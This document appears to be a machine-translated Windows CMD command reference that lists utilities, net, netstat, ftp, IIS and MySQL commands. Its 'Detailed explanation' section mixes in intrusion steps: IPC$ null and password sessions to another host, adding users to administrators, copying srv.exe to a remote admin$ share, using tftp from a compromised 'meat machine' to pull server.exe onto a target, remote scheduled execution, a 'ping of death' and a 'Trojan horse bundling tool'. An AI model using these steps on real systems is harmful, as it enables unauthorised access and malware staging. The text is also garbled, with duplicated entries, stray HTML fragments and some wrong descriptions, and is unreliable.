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Ask about all the commands in the CMD console

cmd command list

1. gpedit.msc-----group policy

2. sndrec32-------recorder

3. Nslookup-------IP address detector

4. explorer-------Open the resource manager

5. logoff ---------Logout command

6. tsshutdn-------60-second countdown shutdown command

7. lusrmgr.msc----This Computer users and groups

8. services.msc---Local service settings

9. oobe/msoobe /a----Check whether XP is activated

10. notepad--------open notepad

11. cleanmgr-------trash management

12. net start messenger---- Start the messenger service

13. compmgmt.msc---Computer Management

14. net stop messenger-----Stop the messenger service

15. conf -----------Start netmeeting

16. dvdplay--------DVD player

17. charmap------ --Start character mapping table

18. diskmgmt.msc---Disk management utility program

19. calc-----------Start calculator< /p>

20. dfrg.msc------Disk defragmentation program

21. chkdsk.exe-----Chkdsk disk check

22 . devmgmt.msc--- Device Manager

23. regsvr32 /u *.dll----Stop dll file running

24. drwtsn32------ System Doctor

25. rononce -p----Shut down in 15 seconds

26. dxdiag---------Check DirectX information

27 . regedt32-------Registry Editor

28. Msconfig.exe---System Configuration Utility

29. rsop.msc------ -Group Policy Result Set

30. mem.exe--------Display memory usage

31. regedit.exe----Registry

32. winchat--------XP comes with LAN chat

33. progman--------Program Manager

34. winmsd---------system information

35. perfmon.msc----computer performance monitoring program

36. winver-------- -Check Windows version

37. sfc /scannow-----Scan errors and recover

38. taskmgr-----Task Manager (2000/xp/2003 < /p>

39. winver---------Check Windows version

40. wmimgmt.msc----Open Windows Management Architecture (WMI)

41. wupdmgr--------windows update program

42. wscript--------windows script host settings

43. write----------WordPad

44. winmsd---------System information

45. wiaacmgr---- ---Scanner and Camera Wizard

46. winchat--------XP comes with LAN chat

47. mem.exe------- -Display memory usage

48. Msconfig.exe---System configuration utility program

49. mplayer2-------Simple widnows media player

< p> 50. mspaint--------Painting Board

51. mstsc----------Remote Desktop Connection

52. mplayer2-- -----Media player

53. magnify--------Magnifying glass utility

54. mmc----------- -Open the console

55. mobsync--------Synchronization command

56. dxdiag---------Check DirectX information

57. drwtsn32------ System Doctor

58. devmgmt.msc--- Device Manager

59. dfrg.msc------ -Disk defragmentation program

60. diskmgmt.msc---Disk management utility program

61. dcomcnfg-------Open system component service

< p> 62. ddeshare-------Open DDE*** share settings

63. dvdplay--------DVD player

64. net stop messenger-----stop the messenger service

65. net start messenger----start the messenger service

66. notepad--------open notepad

67. nslookup-------Network management tool wizard

68. ntbackup-------System backup and restore

69. narrator-------Screen "narrator"

70. ntmsmgr.msc----Mobile Storage Manager

71. ntmsoprq.msc--- Mobile storage administrator operation request

72. netstat -an----(TC) command to check the interface

73. syncapp--------Create a briefcase

74. sysedit--------system configuration editor

75. sigverif-------file signature verification program

76. sndrec32-------Audio recorder

77. shrpubw--------Create a shared folder

78. secpol.msc-- ---Local security policy

79. syskey---------system encryption, once encrypted, it cannot be decrypted, protecting the double password of Windows XP system

80 . services.msc---Local services


81. Sndvol32------Volume Control Program

82. sfc.exe--------System File Checker

< p> 83. sfc /scannow---windows file protection

84. tsshutdn-------60-second countdown shutdown command

3. 84. tsshutdn--- ----60 seconds countdown shutdown command

85. tourstart------xp introduction (the tour xp program that appears after the installation is completed)

86. taskmgr--- -----Task Manager

87. eventvwr-------Event Viewer

88. eudcedit-------Word creation program


89. explorer-------Open the resource manager

90. packager-------Object packaging program

91. perfmon. msc----Computer Performance Monitoring Program

92. progman--------Program Manager

93. regedit.exe----Registry


94. rsop.msc-------Group Policy Result Set

95. regedt32-------Registry Editor

96 . rononce -p ----Shut down in 15 seconds

97. regsvr32 /u *.dll----Stop dll file running

98. regsvr32 /u zipfldr.dll- -----Cancel ZIP support

99. cmd.exe--------CMD command prompt

100. chkdsk.exe-----Chkdsk Disk check

101. certmgr.msc----Certificate management utility

102. calc-----------Start the calculator

103. charmap--------Start character mapping table

104. cliconfg-------SQL SERVER client network utility program

105 . Clipbrd--------Clipboard viewer

106. conf-----------Start netmeeting

107. compmgmt.msc- --Computer management

108. cleanmgr-------Garbage cleaning

109. ciadv.msc------Index service program

110. osk------------Open the on-screen keyboard

111. odbcad32-------ODBC data source manager

112. oobe/msoobe /a----Check whether XP is activated

113. lusrmgr.msc----Local users and groups

114. logoff------ ---Logout command

115. iexpress-------Trojan horse bundling tool, the system comes with it

116. Nslookup-------IP address detection

117. fsmgmt.msc-----Shared Folder Manager

118. utilman--------Auxiliary Tool Manager


119. explor

er-------Open the resource manager

[Edit this paragraph] Detailed explanation of CMD command operation

net use ipipc$ " " /user:" " Establish an IPC empty link

net use ipipc$ "password" /user:"username" to establish a non-empty IPC link

net use h: ipc$ "password" /user:"username" directly After logging in, map the other party C: to the local H:

net use h: ipc$ After logging in, map the other party C: to the local H:

net use ipipc$ /del Delete IPC Link

net use h: /del Delete the mapping of the other party to the local H:

net user username password/add Create user

net user guest /active:yes Activate guest user

net user View which users

net user account name View account attributes

net localgroup administrators username/add Add "user" to the administrator to have administrator rights

net start to see which services are enabled

net start service name to start the service; (such as: net start telnet, net start schedule)

net stop service name to stop a service

net time target ip check the other party's time

net time target ip /set set the local computer time and Time synchronization of the "target IP" host, add the parameter /yes to cancel the confirmation message

net view to see which *** shares are enabled in the local LAN

net view ip to view the other party What shares are enabled in the LAN

net config displays the system network settings

net logoff disconnects the shares

net pause service name Suspend a service

net send ip "text message" Send a message to the other party

net ver Network connection type and information being used in the LAN

net share View Locally enabled *** sharing

net share ipc$ Enable ipc$*** sharing

net share ipc$ /del Delete ipc$*** sharing

< p> net share c$ /del Delete C: ***share

net user guest 12345 After logging in as the guest user, change the password to 12345

net password password change system login Password

netstat -a to check which ports are open, commonly used netstat -an

netstat -n to check the network connection status of the port, commonly used netstat -an

netstat -v View ongoing work

netstat -p protocol name example: netstat -p tcq/ip View the usage of a certain protocol

netstat -s View the usage of all protocols in use

nbtstat -A ip If one of the other party's ports 136 to 139 is open, you can view the user name of the other party's recent login

tracert - parameter ip

(or computer name) trace route (packet), parameter: "-w number" is used to set the timeout interval.

Ping ip (or domain name) sends data with a default size of 32 bytes to the other host. Parameters: "-l [space] packet size"; "-n number of times to send data"; "-t "refers to pinging all the time.

ping -t -l 65550 ip ping of death (sending files larger than 64K and pinging all the time becomes the ping of death)

ipconfig (winipcfg) for windows NT and XP (Windows 95 98) To view the local IP address, ipconfig can use the parameter "/all" to display all configuration information

tlist -t displays the process in a tree line list (it is an additional tool for the system, which is not installed by default. In the Support/tools folder of the installation directory)

kill -F Add the -F parameter to the process name to force the end of a process (it is an additional tool for the system, which is not installed by default. In the Support of the installation directory /tools folder)

Del -F The file name can be deleted by adding the -F parameter. /AR, /AH, /AS, and /AA respectively represent deleting read-only, hidden, and system files. , archive files, /A-R, /A-H, /A-S, /A-A means to delete files other than read-only, hidden, system, and archive files. For example, "DEL/AR *.*" means to delete all read-only files in the current directory, and "DEL/A-S *.*" means to delete all files in the current directory except system files

del /S / Q directory or use: rmdir /s /Q directory /S to delete the directory and all subdirectories and files under the directory. At the same time, use the parameter /Q to cancel the deletion operation and delete it directly after the system confirms it.

(The two commands have the same effect)

move The drive letter path is the file name to be moved. The path to store the moved file. After the move, the file name is the moved file. Use the parameter /y to cancel the prompt to confirm that the same file exists in the moved directory. Direct overwrite

fc one.txt two.txt > 3st.txt Compare the two files and output the differences to the 3st.txt file, "> " and "> >" are redirection commands< /p>

at id number starts a registered scheduled task

at /delete stops all scheduled tasks. Use the parameter /yes to stop directly without confirmation

at id number/delete Stop a registered scheduled task

at View all scheduled tasks

at ip time Program name (or a command) /r Run the other party at a certain time A certain program and restart the computer

finger username @host to see which users have logged in recently

telnet ip port remote and login server, the default port is 23

open ip Connect to IP (command after telnet login)

telnet Type telnet directly on the local machine to enter the telnet of the local machine

copy path file name 1 path file name 2 / y Copy file 1 to the specified directory as file 2. Use the parameter /y to cancel confirmation that you want to overwrite an existing directory file

copy c:srv.exe ipadmin$ Copy local c:srv.exe Go to the other party's admin

Copy 1st.jpg/b+2st.txt/a 3st.jpg Hide the content of 2st.txt into 1st.jpg to generate a new file 3st.jpg. Note: 2st The .txt file header should have three empty rows. Parameters: /b refers to the binary file, /a refers to the ASCLL format file

copy ipadmin$svv.exe c: or:copyipadmin$*.* Copy the other party's admini$* ** Share the srv.exe file (all files) to local C:

xcopy The file or directory tree to be copied. The target address and directory name. Copy the file and directory tree. Use the parameter /Y to overwrite without prompting. Same file

tftp -i own IP (use the meat machine IP when using the meat machine as a springboard) get server.exe c:server.exe After logging in, download the server.exe of "IP" to the target Host c:server.exe Parameters: -i refers to transmission in binary mode, such as when transmitting exe files. If -i is not added, transmission is in ASCII mode (text file transmission mode)

tftp -i The other party's IP put c:server.exe After logging in, upload the local c:server.exe to the host

The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. bin refers to transmission in binary mode (executable file input); the default is ASCII format transmission (text file)

route print displays the IP route, which will mainly display the network address Network addres and the subnet mask Netmask. , gateway address Gateway addres, interface address Interface

arp View and process ARP cache. ARP means name resolution and is responsible for parsing an IP into a physical MAC address.

arp -a will display all information

start program name or command /max or /min to open a new window and maximize (minimize) run a program or command

mem Check the cpu usage

attrib file name (directory name) View the attributes of a file (directory)

attrib file name-A -R -S -H or +A +R + S +H removes (adds) the archive, read-only, system, and hidden attributes of a file; use + to add it as a certain attribute

dir View files, parameters: /Q shows which system the files and directories belong to User, /T:C displays the file creation time, /T:A displays the last time the file was accessed, /T:W last modified time

date /t, time /t use this parameter. "DATE/T", "TIME/T" will only display the current date and time without having to enter a new date and time

set Specify the environment variable name = the character to be assigned to the variable Set the environment variable


set displays all current environment variables

set p (or other characters) displays all current environment variables starting with character p (or other characters)

pause Pause the batch program and display: Please press any key to continue....

if performs conditional processing in the batch program (see if command and variables for more instructions)

The goto label directs cmd.exe to the labeled line in the batch program (the label must be a separate line and preceded by a colon, for example: ":start" label)

The call path batch file name is from Call another batch program in a batch program (for more instructions, see call /?)

for executes a specific command on each file in a set of files (for more instructions, see the for command and variables )

echo on or off turns echo on or off. Using echo only without parameters displays the current echo settings

echo information displays information on the screen

echo information >> pass.txt Save "information" to the pass.txt file

findstr "Hello" aa.txt Find the string hello in the aa.txt file

find Find a file by file name

title title name changes the CMD window title name

color color value sets the foreground and background color of the cmd console; 0=black, 1=blue, 2=green , 3=light green, 4=red, 5=purple, 6=yellow, 7=white, 8=grey, 9=light blue, A=light green, B=light light green, C=light red, D=light Purple, E=light yellow, F=bright white

prompt Change the name of the command prompt displayed by cmd.exe (change C: and D: to: EntSky)

2. ver displays version information in the DOS window

winver pops up a window to display version information (memory size, system version, patch version, computer name)

format drive letter/FS: Type format disk, type: FAT, FAT32, NTFS, example: Format D: /FS:NTFS

md directory name to create directory

replace source file to replace the directory replacement file File

ren original file name new file name renamed file name

tree displays the directory in a tree structure, using the parameter -f will list the file names in the first folder


type filename displays the contents of the text file

more filename displays the output file screen by screen

doskey to be locked

command = character

doskey command to unlock = lock command provided for DOS (edit command line, re-invoke win2k command, and create macro). For example: lock dir command: doskey dir=entsky (doskey dir=dir cannot be used); unlock: doskey dir=

taskmgr brings up the task manager

chkdsk /F D: Check the disk D and display the status report; add parameter /f and repair errors on the disk

tlntadmn telnt service admn, type tlntadmn and select 3, then select 8, you can change the telnet service default port 23 to any other port< /p>

exit exits the cmd.exe program or the current process. Using the parameter /B will exit the current batch script instead of cmd.exe

The file name of the path executable file is the executable file. Set a path.

cmd starts a win2K command interpretation window. Parameters: /eff, /en close and enable command expansion; for more detailed instructions, see cmd /?

regedit /s imports the registry file name into the registry; the parameter /S refers to quiet mode import, without any prompts ;

regedit /e Registry file name exports the registry

The cacls file name parameter displays or modifies the file access control list (ACL) - for NTFS format. Parameters: /D username: set to deny access to a certain user; /P username: perm replaces the access rights of the specified user; /G username: perm grants access rights to the specified user; Perm can be: N none, R read, W writes, C changes (writes), F fully controls; for example: cacls D: est.txt /D pub sets d: est.txt to deny pub user access.

cacls file name to view the file access user permission list

REM text content to add comments in the batch file

netsh to view or change the local network configuration< /p>

3. IIS service command

iisreset /reboot Restart the win2k computer (but a prompt that the system will restart will appear)

iisreset /start or stop Start (stop) All Internet services

iisreset /restart stops and restarts all Internet services

iisreset /status displays the status of all Internet services

iisreset /enable or disable on the local system Enable (disable) the restart of the Internet service on

iisreset /rebootonerror When starting, stopping or restarting the Internet service, if an error occurs, it will reboot

iisreset /noforce If it cannot be stopped Internet service will not be forcibly terminated

iisreset /timeout Val has not stopped the Internet service when the timeout period (seconds) is reached. If the /rebootonerror parameter is specified, the computer will restart. The default value is 20 seconds for restart, 60 seconds for stop, and 0 seconds for restart.

FTP command: (detailed description below)

The command line format of ftp is:

ftp -v -d -i -n -g[ hostname] -v displays all response information from the remote server.

-d uses debugging mode.

-n restricts the automatic login of ftp, that is, does not use the .netrc file.

-g Cancel the global file name.

help [command] or ? [Command] View the command description

bye or quit terminates the host FTP process and exits the FTP management mode.

pwd lists the current remote host directory

put Or send local file name [file name uploaded to the host] to transfer a local file to the remote host

get or recv [remote host file name] [file name downloaded to the local] from Transfer a batch of files from the remote host to the local host

mget [remote-files] Receive a batch of files from the remote host to the local host

mput local-files Transfer a batch of files to the local host Transfer files to the remote host

dir or ls [remote-directory] [local-file] lists the files in the current remote host directory. If there are local files, write the results to the local file< /p>

ascii Set to send files in ASCII mode (default value)

bin or image Set to send files in binary mode

bell Each time a file transfer is completed, Alarm prompt

cdup returns to the previous directory

close interrupts the ftp session with the remote server (corresponding to open)

open host[port] establishes the specified ftp Server connection, you can specify the connection port

delete delete files in the remote host

mdelete [remote-files] delete a batch of files

mkdir directory-name Create a directory on the remote host

rename [from] [to] Change the file name on the remote host

rmdir directory-name Delete the directory on the remote host

status displays the current FTP status

system displays the remote host system type

user user-name [password] [account] Re-login to the remote host with another user name Host

open host [port] Re-establish a new connection

prompt interactive prompt mode

macdef define macro command

lcd change The current working directory of the local host. If default, go to the current user's HOME directory

chmod changes the file permissions of the remote host

case When it is ON, use the MGET command Copy the file names to the local machine and convert them all to lowercase letters

cd remote-dir enters the remote host directory

cdup enters the parent directory of the remote host directory

! Execute an interactive shell on the local machine, exit and return to the ftp environment, such as !ls*.zip


4. MYSQL command

mysql -h host address -u username -p password to connect to MYSQL; if MYSQL has just been installed, the super user root does not have a password.

(Example: mysql -h110.110.110.110 -Uroot -P123456

Note: u and root do not need to add spaces, and the same applies to others)

exit Exit MYSQL

mysqladmin -u username -p old password password new password change password

grant select on database.* to username@login host identified by "password"; add new user. (Note: Unlike the above, the following are commands in the MYSQL environment, so they are followed by a semicolon as the command terminator)

show databases; Display the database list. At the beginning, there were only two databases: mysql and test. The mysql library is very important. It contains MYSQL system information. When we change passwords and add new users, we actually use this library for operations.

use mysql;

show tables; display the data tables in the library

describe table name; display the structure of the data table

create database database name; create database

use database name;

create table table name (field setting list); create table

drop database database name; < /p>

drop table table name; delete database and table

delete from table name; clear the records in the table

select * from table name; display the records in the table Record

mysqldump --opt school>school.bbb Back up the database: (The command is executed in the mysqlin directory of DOS); Note: Back up the database school to the school.bbb file, school.bbb is a text file , choose any file name, open it and see what new discoveries you will make.

New commands under win2003 system (practical part):

shutdown /parameter to shut down or restart the local or remote host.

Parameter description: /S shuts down the host, /R restarts the host, /T digitally sets the delay time, ranging from 0 to 180 seconds, /A cancels booting, /M //IP specified remote host.

Example: shutdown /r /t 0 Restart the local host immediately (no delay)

taskill /parameter process name or pid of the process Terminate one or more tasks and processes.

Parameter description: /PID is the pid of the process to be terminated. You can use the tasklist command to obtain the pid of each process, /IM is the process name of the process to be terminated, /F is to forcefully terminate the process, /T is to terminate the specified process and The child process he started.

tasklist displays the process identifiers (PIDs) of processes, services, and service processes currently running on local and remote hosts.

Parameter description: /M lists the dll files loaded by the current process, /SVC displays the services corresponding to each process, if there is no parameter, only the current process is listed.